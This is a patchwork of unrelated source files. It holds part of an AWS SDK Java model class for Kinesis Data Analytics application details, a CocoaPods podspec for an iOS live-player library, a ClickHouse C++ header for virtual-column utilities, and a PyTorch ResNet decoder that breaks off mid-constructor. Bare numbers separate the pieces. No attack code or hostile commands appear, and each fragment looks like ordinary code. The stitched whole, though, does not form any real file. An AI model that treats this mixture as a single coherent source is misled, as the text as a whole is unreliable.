* * @return The description of the application. */ public String getApplicationDescription() { return this.applicationDescription; } /** * <p> * The description of the application. * </p> * * @param applicationDescription * The description of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationDescription(String applicationDescription) { setApplicationDescription(applicationDescription); return this; } /** * <p> * The name of the application. * </p> * * @param applicationName * The name of the application. */ public void setApplicationName(String applicationName) { this.applicationName = applicationName; } /** * <p> * The name of the application. * </p> * * @return The name of the application. */ public String getApplicationName() { return this.applicationName; } /** * <p> * The name of the application. * </p> * * @param applicationName * The name of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationName(String applicationName) { setApplicationName(applicationName); return this; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @see RuntimeEnvironment */ public void setRuntimeEnvironment(String runtimeEnvironment) { this.runtimeEnvironment = runtimeEnvironment; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @return The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). 
* @see RuntimeEnvironment */ public String getRuntimeEnvironment() { return this.runtimeEnvironment; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @return Returns a reference to this object so that method calls can be chained together. * @see RuntimeEnvironment */ public ApplicationDetail withRuntimeEnvironment(String runtimeEnvironment) { setRuntimeEnvironment(runtimeEnvironment); return this; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @return Returns a reference to this object so that method calls can be chained together. * @see RuntimeEnvironment */ public ApplicationDetail withRuntimeEnvironment(RuntimeEnvironment runtimeEnvironment) { this.runtimeEnvironment = runtimeEnvironment.toString(); return this; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @param serviceExecutionRole * Specifies the IAM role that the application uses to access external resources. */ public void setServiceExecutionRole(String serviceExecutionRole) { this.serviceExecutionRole = serviceExecutionRole; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @return Specifies the IAM role that the application uses to access external resources. */ public String getServiceExecutionRole() { return this.serviceExecutionRole; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @param serviceExecutionRole * Specifies the IAM role that the application uses to access external resources. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withServiceExecutionRole(String serviceExecutionRole) { setServiceExecutionRole(serviceExecutionRole); return this; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @see ApplicationStatus */ public void setApplicationStatus(String applicationStatus) { this.applicationStatus = applicationStatus; } /** * <p> * The status of the application. * </p> * * @return The status of the application. * @see ApplicationStatus */ public String getApplicationStatus() { return this.applicationStatus; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationStatus */ public ApplicationDetail withApplicationStatus(String applicationStatus) { setApplicationStatus(applicationStatus); return this; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @return Returns a reference to this object so that method calls can be chained together. 
* @see ApplicationStatus */ public ApplicationDetail withApplicationStatus(ApplicationStatus applicationStatus) { this.applicationStatus = applicationStatus.toString(); return this; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @param applicationVersionId * Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. */ public void setApplicationVersionId(Long applicationVersionId) { this.applicationVersionId = applicationVersionId; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @return Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. */ public Long getApplicationVersionId() { return this.applicationVersionId; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @param applicationVersionId * Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionId(Long applicationVersionId) { setApplicationVersionId(applicationVersionId); return this; } /** * <p> * The current timestamp when the application was created. * </p> * * @param createTimestamp * The current timestamp when the application was created. */ public void setCreateTimestamp(java.util.Date createTimestamp) { this.createTimestamp = createTimestamp; } /** * <p> * The current timestamp when the application was created. * </p> * * @return The current timestamp when the application was created. */ public java.util.Date getCreateTimestamp() { return this.createTimestamp; } /** * <p> * The current timestamp when the application was created. * </p> * * @param createTimestamp * The current timestamp when the application was created. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCreateTimestamp(java.util.Date createTimestamp) { setCreateTimestamp(createTimestamp); return this; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @param lastUpdateTimestamp * The current timestamp when the application was last updated. */ public void setLastUpdateTimestamp(java.util.Date lastUpdateTimestamp) { this.lastUpdateTimestamp = lastUpdateTimestamp; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @return The current timestamp when the application was last updated. */ public java.util.Date getLastUpdateTimestamp() { return this.lastUpdateTimestamp; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @param lastUpdateTimestamp * The current timestamp when the application was last updated. * @return Returns a reference to this object so that method calls can be chained together. 
*/ public ApplicationDetail withLastUpdateTimestamp(java.util.Date lastUpdateTimestamp) { setLastUpdateTimestamp(lastUpdateTimestamp); return this; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @param applicationConfigurationDescription * Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. */ public void setApplicationConfigurationDescription(ApplicationConfigurationDescription applicationConfigurationDescription) { this.applicationConfigurationDescription = applicationConfigurationDescription; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @return Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. */ public ApplicationConfigurationDescription getApplicationConfigurationDescription() { return this.applicationConfigurationDescription; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @param applicationConfigurationDescription * Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationConfigurationDescription(ApplicationConfigurationDescription applicationConfigurationDescription) { setApplicationConfigurationDescription(applicationConfigurationDescription); return this; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @return Describes the application Amazon CloudWatch logging options. */ public java.util.List<CloudWatchLoggingOptionDescription> getCloudWatchLoggingOptionDescriptions() { return cloudWatchLoggingOptionDescriptions; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. */ public void setCloudWatchLoggingOptionDescriptions(java.util.Collection<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions) { if (cloudWatchLoggingOptionDescriptions == null) { this.cloudWatchLoggingOptionDescriptions = null; return; } this.cloudWatchLoggingOptionDescriptions = new java.util.ArrayList<CloudWatchLoggingOptionDescription>(cloudWatchLoggingOptionDescriptions); } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setCloudWatchLoggingOptionDescriptions(java.util.Collection)} or * {@link #withCloudWatchLoggingOptionDescriptions(java.util.Collection)} if you want to override the existing * values. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCloudWatchLoggingOptionDescriptions(CloudWatchLoggingOptionDescription... 
cloudWatchLoggingOptionDescriptions) { if (this.cloudWatchLoggingOptionDescriptions == null) { setCloudWatchLoggingOptionDescriptions(new java.util.ArrayList<CloudWatchLoggingOptionDescription>(cloudWatchLoggingOptionDescriptions.length)); } for (CloudWatchLoggingOptionDescription ele : cloudWatchLoggingOptionDescriptions) { this.cloudWatchLoggingOptionDescriptions.add(ele); } return this; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCloudWatchLoggingOptionDescriptions( java.util.Collection<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions) { setCloudWatchLoggingOptionDescriptions(cloudWatchLoggingOptionDescriptions); return this; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @param applicationMaintenanceConfigurationDescription * The details of the maintenance configuration for the application. */ public void setApplicationMaintenanceConfigurationDescription(ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription) { this.applicationMaintenanceConfigurationDescription = applicationMaintenanceConfigurationDescription; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @return The details of the maintenance configuration for the application. */ public ApplicationMaintenanceConfigurationDescription getApplicationMaintenanceConfigurationDescription() { return this.applicationMaintenanceConfigurationDescription; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @param applicationMaintenanceConfigurationDescription * The details of the maintenance configuration for the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationMaintenanceConfigurationDescription( ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription) { setApplicationMaintenanceConfigurationDescription(applicationMaintenanceConfigurationDescription); return this; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @param applicationVersionUpdatedFrom * The previous application version before the latest application update. <a>RollbackApplication</a> reverts * the application to this version. */ public void setApplicationVersionUpdatedFrom(Long applicationVersionUpdatedFrom) { this.applicationVersionUpdatedFrom = applicationVersionUpdatedFrom; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @return The previous application version before the latest application update. <a>RollbackApplication</a> reverts * the application to this version. */ public Long getApplicationVersionUpdatedFrom() { return this.applicationVersionUpdatedFrom; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @param applicationVersionUpdatedFrom * The previous application version before the latest application update. 
<a>RollbackApplication</a> reverts * the application to this version. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionUpdatedFrom(Long applicationVersionUpdatedFrom) { setApplicationVersionUpdatedFrom(applicationVersionUpdatedFrom); return this; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @param applicationVersionRolledBackFrom * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. */ public void setApplicationVersionRolledBackFrom(Long applicationVersionRolledBackFrom) { this.applicationVersionRolledBackFrom = applicationVersionRolledBackFrom; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @return If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. */ public Long getApplicationVersionRolledBackFrom() { return this.applicationVersionRolledBackFrom; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @param applicationVersionRolledBackFrom * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionRolledBackFrom(Long applicationVersionRolledBackFrom) { setApplicationVersionRolledBackFrom(applicationVersionRolledBackFrom); return this; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @param conditionalToken * A value you use to implement strong concurrency for application updates. */ public void setConditionalToken(String conditionalToken) { this.conditionalToken = conditionalToken; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @return A value you use to implement strong concurrency for application updates. */ public String getConditionalToken() { return this.conditionalToken; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @param conditionalToken * A value you use to implement strong concurrency for application updates. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withConditionalToken(String conditionalToken) { setConditionalToken(conditionalToken); return this; } /** * <p> * The version to which you want to roll back the application. * </p> * * @param applicationVersionRolledBackTo * The version to which you want to roll back the application. */ public void setApplicationVersionRolledBackTo(Long applicationVersionRolledBackTo) { this.applicationVersionRolledBackTo = applicationVersionRolledBackTo; } /** * <p> * The version to which you want to roll back the application. * </p> * * @return The version to which you want to roll back the application. */ public Long getApplicationVersionRolledBackTo() { return this.applicationVersionRolledBackTo; } /** * <p> * The version to which you want to roll back the application. 
* </p> * * @param applicationVersionRolledBackTo * The version to which you want to roll back the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionRolledBackTo(Long applicationVersionRolledBackTo) { setApplicationVersionRolledBackTo(applicationVersionRolledBackTo); return this; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @see ApplicationMode */ public void setApplicationMode(String applicationMode) { this.applicationMode = applicationMode; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @return To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @see ApplicationMode */ public String getApplicationMode() { return this.applicationMode; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationMode */ public ApplicationDetail withApplicationMode(String applicationMode) { setApplicationMode(applicationMode); return this; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationMode */ public ApplicationDetail withApplicationMode(ApplicationMode applicationMode) { this.applicationMode = applicationMode.toString(); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. 
* * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getApplicationARN() != null) sb.append("ApplicationARN: ").append(getApplicationARN()).append(","); if (getApplicationDescription() != null) sb.append("ApplicationDescription: ").append(getApplicationDescription()).append(","); if (getApplicationName() != null) sb.append("ApplicationName: ").append(getApplicationName()).append(","); if (getRuntimeEnvironment() != null) sb.append("RuntimeEnvironment: ").append(getRuntimeEnvironment()).append(","); if (getServiceExecutionRole() != null) sb.append("ServiceExecutionRole: ").append(getServiceExecutionRole()).append(","); if (getApplicationStatus() != null) sb.append("ApplicationStatus: ").append(getApplicationStatus()).append(","); if (getApplicationVersionId() != null) sb.append("ApplicationVersionId: ").append(getApplicationVersionId()).append(","); if (getCreateTimestamp() != null) sb.append("CreateTimestamp: ").append(getCreateTimestamp()).append(","); if (getLastUpdateTimestamp() != null) sb.append("LastUpdateTimestamp: ").append(getLastUpdateTimestamp()).append(","); if (getApplicationConfigurationDescription() != null) sb.append("ApplicationConfigurationDescription: ").append(getApplicationConfigurationDescription()).append(","); if (getCloudWatchLoggingOptionDescriptions() != null) sb.append("CloudWatchLoggingOptionDescriptions: ").append(getCloudWatchLoggingOptionDescriptions()).append(","); if (getApplicationMaintenanceConfigurationDescription() != null) sb.append("ApplicationMaintenanceConfigurationDescription: ").append(getApplicationMaintenanceConfigurationDescription()).append(","); if (getApplicationVersionUpdatedFrom() != null) sb.append("ApplicationVersionUpdatedFrom: ").append(getApplicationVersionUpdatedFrom()).append(","); if (getApplicationVersionRolledBackFrom() != null) sb.append("ApplicationVersionRolledBackFrom: ").append(getApplicationVersionRolledBackFrom()).append(","); if (getConditionalToken() != null) sb.append("ConditionalToken: ").append(getConditionalToken()).append(","); if (getApplicationVersionRolledBackTo() != null) sb.append("ApplicationVersionRolledBackTo: ").append(getApplicationVersionRolledBackTo()).append(","); if (getApplicationMode() != null) sb.append("ApplicationMode: ").append(getApplicationMode()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof ApplicationDetail == false) return false; ApplicationDetail other = (ApplicationDetail) obj; if (other.getApplicationARN() == null ^ this.getApplicationARN() == null) return false; if (other.getApplicationARN() != null && other.getApplicationARN().equals(this.getApplicationARN()) == false) return false; if (other.getApplicationDescription() == null ^ this.getApplicationDescription() == null) return false; if (other.getApplicationDescription() != null && other.getApplicationDescription().equals(this.getApplicationDescription()) == false) return false; if (other.getApplicationName() == null ^ this.getApplicationName() == null) return false; if (other.getApplicationName() != null && other.getApplicationName().equals(this.getApplicationName()) == false) return false; if (other.getRuntimeEnvironment() == null ^ this.getRuntimeEnvironment() == null) return false; if (other.getRuntimeEnvironment() != null && other.getRuntimeEnvironment().equals(this.getRuntimeEnvironment()) == false) return false; if 
(other.getServiceExecutionRole() == null ^ this.getServiceExecutionRole() == null) return false; if (other.getServiceExecutionRole() != null && other.getServiceExecutionRole().equals(this.getServiceExecutionRole()) == false) return false; if (other.getApplicationStatus() == null ^ this.getApplicationStatus() == null) return false; if (other.getApplicationStatus() != null && other.getApplicationStatus().equals(this.getApplicationStatus()) == false) return false; if (other.getApplicationVersionId() == null ^ this.getApplicationVersionId() == null) return false; if (other.getApplicationVersionId() != null && other.getApplicationVersionId().equals(this.getApplicationVersionId()) == false) return false; if (other.getCreateTimestamp() == null ^ this.getCreateTimestamp() == null) return false; if (other.getCreateTimestamp() != null && other.getCreateTimestamp().equals(this.getCreateTimestamp()) == false) return false; if (other.getLastUpdateTimestamp() == null ^ this.getLastUpdateTimestamp() == null) return false; if (other.getLastUpdateTimestamp() != null && other.getLastUpdateTimestamp().equals(this.getLastUpdateTimestamp()) == false) return false; if (other.getApplicationConfigurationDescription() == null ^ this.getApplicationConfigurationDescription() == null) return false; if (other.getApplicationConfigurationDescription() != null && other.getApplicationConfigurationDescription().equals(this.getApplicationConfigurationDescription()) == false) return false; if (other.getCloudWatchLoggingOptionDescriptions() == null ^ this.getCloudWatchLoggingOptionDescriptions() == null) return false; if (other.getCloudWatchLoggingOptionDescriptions() != null && other.getCloudWatchLoggingOptionDescriptions().equals(this.getCloudWatchLoggingOptionDescriptions()) == false) return false; if (other.getApplicationMaintenanceConfigurationDescription() == null ^ this.getApplicationMaintenanceConfigurationDescription() == null) return false; if (other.getApplicationMaintenanceConfigurationDescription() != null && other.getApplicationMaintenanceConfigurationDescription().equals(this.getApplicationMaintenanceConfigurationDescription()) == false) return false; if (other.getApplicationVersionUpdatedFrom() == null ^ this.getApplicationVersionUpdatedFrom() == null) return false; if (other.getApplicationVersionUpdatedFrom() != null && other.getApplicationVersionUpdatedFrom().equals(this.getApplicationVersionUpdatedFrom()) == false) return false; if (other.getApplicationVersionRolledBackFrom() == null ^ this.getApplicationVersionRolledBackFrom() == null) return false; if (other.getApplicationVersionRolledBackFrom() != null && other.getApplicationVersionRolledBackFrom().equals(this.getApplicationVersionRolledBackFrom()) == false) return false; if (other.getConditionalToken() == null ^ this.getConditionalToken() == null) return false; if (other.getConditionalToken() != null && other.getConditionalToken().equals(this.getConditionalToken()) == false) return false; if (other.getApplicationVersionRolledBackTo() == null ^ this.getApplicationVersionRolledBackTo() == null) return false; if (other.getApplicationVersionRolledBackTo() != null && other.getApplicationVersionRolledBackTo().equals(this.getApplicationVersionRolledBackTo()) == false) return false; if (other.getApplicationMode() == null ^ this.getApplicationMode() == null) return false; if (other.getApplicationMode() != null && other.getApplicationMode().equals(this.getApplicationMode()) == false) return false; return true; } @Override public int hashCode() { final int prime = 
31; int hashCode = 1; hashCode = prime * hashCode + ((getApplicationARN() == null) ? 0 : getApplicationARN().hashCode()); hashCode = prime * hashCode + ((getApplicationDescription() == null) ? 0 : getApplicationDescription().hashCode()); hashCode = prime * hashCode + ((getApplicationName() == null) ? 0 : getApplicationName().hashCode()); hashCode = prime * hashCode + ((getRuntimeEnvironment() == null) ? 0 : getRuntimeEnvironment().hashCode()); hashCode = prime * hashCode + ((getServiceExecutionRole() == null) ? 0 : getServiceExecutionRole().hashCode()); hashCode = prime * hashCode + ((getApplicationStatus() == null) ? 0 : getApplicationStatus().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionId() == null) ? 0 : getApplicationVersionId().hashCode()); hashCode = prime * hashCode + ((getCreateTimestamp() == null) ? 0 : getCreateTimestamp().hashCode()); hashCode = prime * hashCode + ((getLastUpdateTimestamp() == null) ? 0 : getLastUpdateTimestamp().hashCode()); hashCode = prime * hashCode + ((getApplicationConfigurationDescription() == null) ? 0 : getApplicationConfigurationDescription().hashCode()); hashCode = prime * hashCode + ((getCloudWatchLoggingOptionDescriptions() == null) ? 0 : getCloudWatchLoggingOptionDescriptions().hashCode()); hashCode = prime * hashCode + ((getApplicationMaintenanceConfigurationDescription() == null) ? 0 : getApplicationMaintenanceConfigurationDescription().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionUpdatedFrom() == null) ? 0 : getApplicationVersionUpdatedFrom().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionRolledBackFrom() == null) ? 0 : getApplicationVersionRolledBackFrom().hashCode()); hashCode = prime * hashCode + ((getConditionalToken() == null) ? 0 : getConditionalToken().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionRolledBackTo() == null) ? 0 : getApplicationVersionRolledBackTo().hashCode()); hashCode = prime * hashCode + ((getApplicationMode() == null) ? 0 : getApplicationMode().hashCode()); return hashCode; } @Override public ApplicationDetail clone() { try { return (ApplicationDetail) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.kinesisanalyticsv2.model.transform.ApplicationDetailMarshaller.getInstance().marshall(this, protocolMarshaller); } }
14,878
5,169
{ "name": "GSLLivePlayer", "version": "1.1.1", "summary": "GSL LivePlayer", "description": "哥斯拉六路连麦", "homepage": "https://github.com/wangtongvip/GSLLivePlayer/blob/master/README.md", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "wangtong": "<EMAIL>" }, "platforms": { "ios": "9.0" }, "source": { "git": "https://github.com/wangtongvip/GSLLivePlayer.git", "tag": "1.1.1" }, "source_files": [ "GSLLivePlayer/GSLLivePlayerDemo/LiveRoomViewController.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/LiveControlView.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/PreviewView.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/SettingManager.{h,m}" ], "frameworks": "UIKit", "vendored_frameworks": [ "GSLLivePlayerFramework.framework", "TXLiteAVSDK_TRTC.framework", "GSLSignalingCenterFramework.framework" ], "libraries": [ "c++", "resolv" ], "requires_arc": true }
444
15,577
<filename>src/Storages/VirtualColumnUtils.h #pragma once #include <Core/Block.h> #include <Interpreters/Context_fwd.h> #include <Parsers/IAST_fwd.h> #include <Storages/SelectQueryInfo.h> #include <unordered_set> namespace DB { class NamesAndTypesList; namespace VirtualColumnUtils { /// Adds to the select query section `WITH value AS column_name`, and uses func /// to wrap the value (if any) /// /// For example: /// - `WITH 9000 as _port`. /// - `WITH toUInt16(9000) as _port`. void rewriteEntityInAst(ASTPtr ast, const String & column_name, const Field & value, const String & func = ""); /// Prepare `expression_ast` to filter block. Returns true if `expression_ast` is not trimmed, that is, /// `block` provides all needed columns for `expression_ast`, else return false. bool prepareFilterBlockWithQuery(const ASTPtr & query, ContextPtr context, Block block, ASTPtr & expression_ast); /// Leave in the block only the rows that fit under the WHERE clause and the PREWHERE clause of the query. /// Only elements of the outer conjunction are considered, depending only on the columns present in the block. /// If `expression_ast` is passed, use it to filter block. void filterBlockWithQuery(const ASTPtr & query, Block & block, ContextPtr context, ASTPtr expression_ast = {}); /// Extract from the input stream a set of `name` column values template <typename T> auto extractSingleValueFromBlock(const Block & block, const String & name) { std::unordered_set<T> res; const ColumnWithTypeAndName & data = block.getByName(name); size_t rows = block.rows(); for (size_t i = 0; i < rows; ++i) res.insert((*data.column)[i].get<T>()); return res; } } }
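As a rough usage sketch for the template helper above — the wrapper name and the assumption that the block already carries a String column called "_file" are mine, not ClickHouse's:

#include <Storages/VirtualColumnUtils.h>

namespace DB
{

// Hypothetical helper: collects the distinct values of a "_file" virtual column
// that some storage has already materialized into `block`.
std::unordered_set<String> collectVirtualFileNames(const Block & block)
{
    return VirtualColumnUtils::extractSingleValueFromBlock<String>(block, "_file");
}

}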
530
343
import logging import torch.nn as nn from networks.ops import SpectralNorm def conv5x5(in_planes, out_planes, stride=1, groups=1, dilation=1): """5x5 convolution with padding""" return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride, padding=2, groups=groups, bias=False, dilation=dilation) def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): """3x3 convolution with padding""" return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, groups=groups, bias=False, dilation=dilation) def conv1x1(in_planes, out_planes, stride=1): """1x1 convolution""" return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False) class BasicBlock(nn.Module): expansion = 1 def __init__(self, inplanes, planes, stride=1, upsample=None, norm_layer=None, large_kernel=False): super(BasicBlock, self).__init__() if norm_layer is None: norm_layer = nn.BatchNorm2d self.stride = stride conv = conv5x5 if large_kernel else conv3x3 # Both self.conv1 and self.downsample layers downsample the input when stride != 1 if self.stride > 1: self.conv1 = SpectralNorm(nn.ConvTranspose2d(inplanes, inplanes, kernel_size=4, stride=2, padding=1, bias=False)) else: self.conv1 = SpectralNorm(conv(inplanes, inplanes)) self.bn1 = norm_layer(inplanes) self.activation = nn.LeakyReLU(0.2, inplace=True) self.conv2 = SpectralNorm(conv(inplanes, planes)) self.bn2 = norm_layer(planes) self.upsample = upsample def forward(self, x): identity = x out = self.conv1(x) out = self.bn1(out) out = self.activation(out) out = self.conv2(out) out = self.bn2(out) if self.upsample is not None: identity = self.upsample(x) out += identity out = self.activation(out) return out class ResNet_D_Dec(nn.Module): def __init__(self, block, layers, norm_layer=None, large_kernel=False, late_downsample=False): super(ResNet_D_Dec, self).__init__() self.logger = logging.getLogger("Logger") if norm_layer is None: norm_layer = nn.BatchNorm2d self._norm_layer = norm_layer self.large_kernel = large_kernel self.kernel_size = 5 if self.large_kernel else 3 self.inplanes = 512 if layers[0] > 0 else 256 self.late_downsample = late_downsample self.midplanes = 64 if late_downsample else 32 self.conv1 = SpectralNorm(nn.ConvTranspose2d(self.midplanes, 32, kernel_size=4, stride=2, padding=1, bias=False)) self.bn1 = norm_layer(32) self.leaky_relu = nn.LeakyReLU(0.2, inplace=True) self.conv2 = nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2) self.upsample = nn.UpsamplingNearest2d(scale_factor=2) self.tanh = nn.Tanh() self.layer1 = self._make_layer(block, 256, layers[0], stride=2) self.layer2 = self._make_layer(block, 128, layers[1], stride=2) self.layer3 = self._make_layer(block, 64, layers[2], stride=2) self.layer4 = self._make_layer(block, self.midplanes, layers[3], stride=2) for m in self.modules(): if isinstance(m, nn.Conv2d): if hasattr(m, "weight_bar"): nn.init.xavier_uniform_(m.weight_bar) else: nn.init.xavier_uniform_(m.weight) elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) # Zero-initialize the last BN in each residual branch, # so that the residual branch starts with zeros, and each residual block behaves like an identity. 
